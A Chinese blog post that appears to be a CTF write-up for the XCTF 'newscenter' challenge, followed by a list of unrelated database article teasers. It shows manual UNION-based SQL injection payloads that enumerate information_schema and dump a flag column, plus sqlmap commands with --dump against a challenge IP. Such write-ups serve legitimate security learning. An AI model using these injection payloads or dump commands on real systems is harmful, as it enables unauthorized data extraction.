[wp]xctf newscenter

原創 l0nmar 2020-07-04 13:33

手工注入

查詢所有數據庫名稱和表名
’ union select 1,table_schema,table_name from information_schema.tables#

  • 發現就兩個數據庫information_schema與news
  • 查詢news數據庫中的表的名稱
    ’ union select 1,table_schema,table_name from information_schema.tables where table_schema=‘news’ #

在這裏插入圖片描述

  • 查詢secret_table裏面的列名
    ’ union select 1,table_name,column_name from information_schema.columns where table_name=‘secret_table’ #
    在這裏插入圖片描述
  • 查詢fl4g裏的字段
    ’ union select 1,1,fl4g from secret_table #
    在這裏插入圖片描述

sqlmap

sqlmap常用命令:
https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html

  • post的注入方式 sqlmap -u “url” --data “search=suibianxie”
    在這裏插入圖片描述
  • 查看錶信息
  • sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” --columns
    在這裏插入圖片描述
  • 查看fl4g字段 --dump查看錶中數據即可
  • sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” -T secret_table --dump

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

【GaussDB(for MySQL)】 Big IN查詢優化

本文分享自華爲雲社區《【MySQL技術專欄】GaussDB(for MySQL) Big IN查詢優化》,作者:GaussDB 數據庫。 背景介紹 在生產環境中,經常會遇到客戶業務的SQL語句進行過濾查詢

原創 2024-05-09 11:21:05

什麼情況下 MySQL 連查詢都能被阻塞?

MySQL 的鎖也是不少,在哪種情況下會連查詢都能被阻塞?這是一個有意思的問題。 工作中,很多開發和 DBA 可能接觸較多的鎖也就行鎖了。對於行鎖,阻塞寫能理解,阻塞讀實在是想不到。能阻塞讀的那肯定是顆粒度更大的鎖了,比如表級別的。 作者

原創 2024-05-08 23:28:09

降本增笑P0事故頻發,構建持續高可用系統的破局之道

2023年的互聯網世界,“草臺班子”、“降本增笑”、“開猿節流”成爲大家互相調侃的關鍵詞。苦笑過後,問題還在,事故終要覆盤,未來仍需規劃。從架構角度看,我們應該怎麼去認清高可用的本質,並真正在業務場景中做好高可用,這是本文想跟大家探討

原創 2024-05-08 23:17:58

Sermant在異地多活場景下的實踐

本文分享自華爲雲社區《Sermant在異地多活場景下的實踐》,作者:華爲雲開源。 Sermant社區在1.3.0和1.4.0版本相繼推出了消息隊列禁止消費插件和數據庫禁寫插件,分別用於解決異地多活場景下的故障切流和保護數據一致性問題。本文將

原創 2024-05-08 10:34:22

MySQL VARCHAR 最佳長度評估實踐

你的 VARCHAR 長度合適麼? 作者:官永強,愛可生 DBA 團隊成員,擅長 MySQL 運維方面的技能。熱愛學習新知識,亦是個愛打遊戲的宅男。 作者:李富強,愛可生 DBA 團隊成員,熟悉 MySQL,TiDB,OceanBase

原創 2024-05-07 23:20:50

營銷權益平臺春晚技術探究| 京東雲技術團隊

一、引言 在當前快速發展的互聯網環境中,許多企業和服務都面臨着高併發場景的挑戰。隨着用戶規模不斷增長,對於同一時間內大量用戶請求的處理能力、系統性能、穩定性和容錯性的要求也日益提高。高併發場景對系統架構設計、數據庫設計、緩存策略、自動化運

原創 2024-05-07 23:17:14

Centos7 使用 Docker 安裝 owncloud

centos7 安裝 docker 安裝教程可參考:centos7 安裝 docker 開始安裝owncloud 1. 創建一個新的項目目錄 mkdir owncloud-docker-server cd owncloud-doc

原創 2024-05-06 23:24:42

MySQL 社區經理:MySQL 8.4 InnoDB 參數默認值爲什麼要這麼改?

MySQL 8.4 LTS 版本,我們一共修改了 20 個 InnoDB 變量的默認值。 作者:Frederic Descamps,EMEA 和亞太地區的 MySQL 社區經理。於 2016 年 5 月加入 MySQL 社區團隊。擔任開源

原創 2024-05-06 23:20:21

lightdb操作出錯:ERROR: current transaction is aborted, commands ignored until end of transaction block

前言         lightdb數據庫是恆生自主研發的面向金融領域的支持集中式和分佈式的國產數據庫,實現基於PostgreSQL,因此也會遵循postgreSQL的一些事務特性。本文章主要說明的特性爲:在一個事務中,如果有一個SQL執

原創 2024-05-05 21:55:25

分享一份物聯網SAAS平臺架構設計

一、架構圖**** 二、Nginx**** 用於做服務的反向代理。 三、網關**** PaaS平臺所有服務統一入口,包含token鑑權功能。 四、開放平臺**** 對第三方平臺開放的服務入口。 五、MQTT**** MQTT用於設備消息通

原創 2024-04-30 23:42:19

巧用 TiCDC Syncpiont 構建銀行實時交易和準實時計算一體化架構

本文闡述了某商業銀行如何利用 TiCDC Syncpoint 功能,在 TiDB 平臺上構建一個既能處理實時交易又能進行準實時計算的一體化架構,用以優化其零售資格業務系統的實踐。通過遷移到 TiDB 並巧妙應用 Syncpoint,該銀行成

原創 2024-04-30 22:24:58

爲什麼公共事業機構會偏愛 TiDB :TiDB 數據庫在某省婦幼健康管理系統的應用

本文介紹了某省婦幼健康管理系統的建設和數據庫架構優化的過程。原有的數據庫架構使用了 StarRocks 作爲分析層,但隨着業務的發展,這套架構暴露出諸多痛點,不再適應婦幼業務的需求。爲解決這些問題,該系統選擇了將原有架構中的 StarRoc

原創 2024-04-30 22:24:57

從NoSQL到NewSQL——10年代大數據浪潮下的技術革新

引言     在數字化浪潮的推動下,數據庫技術已成爲支撐數字經濟的堅實基石。騰訊雲 TVP《技術指針》聯合《明說三人行》特別策劃的直播系列——【中國數據庫前世今生】,我們將通過五期直播,帶您穿越五個十年,深入探討每個時代的數據庫演變

原創 2024-04-28 23:12:26

MySQL查出時間比實際晚8小時的解決方案

查詢出來的日期數據比數據庫中日期數據晚8小時,一開始很懵逼,IDEA 和 server 時區都一樣呢!後來發現: jdbcUrl=jdbc:mysql://localhost:hentai?useUnicode=true&character

原創 2024-04-27 01:09:40

clickhouse vs starRocks|||

比對結論 如果只能單機部署的話,clickhouse基本無敵。 如果集羣化,starRocks可以替換clickhouse,但支持的函數會相對少一些(clickhouse有不少自定義函數) 信息比對 功能 clickhouse

原創 2024-04-26 11:25:43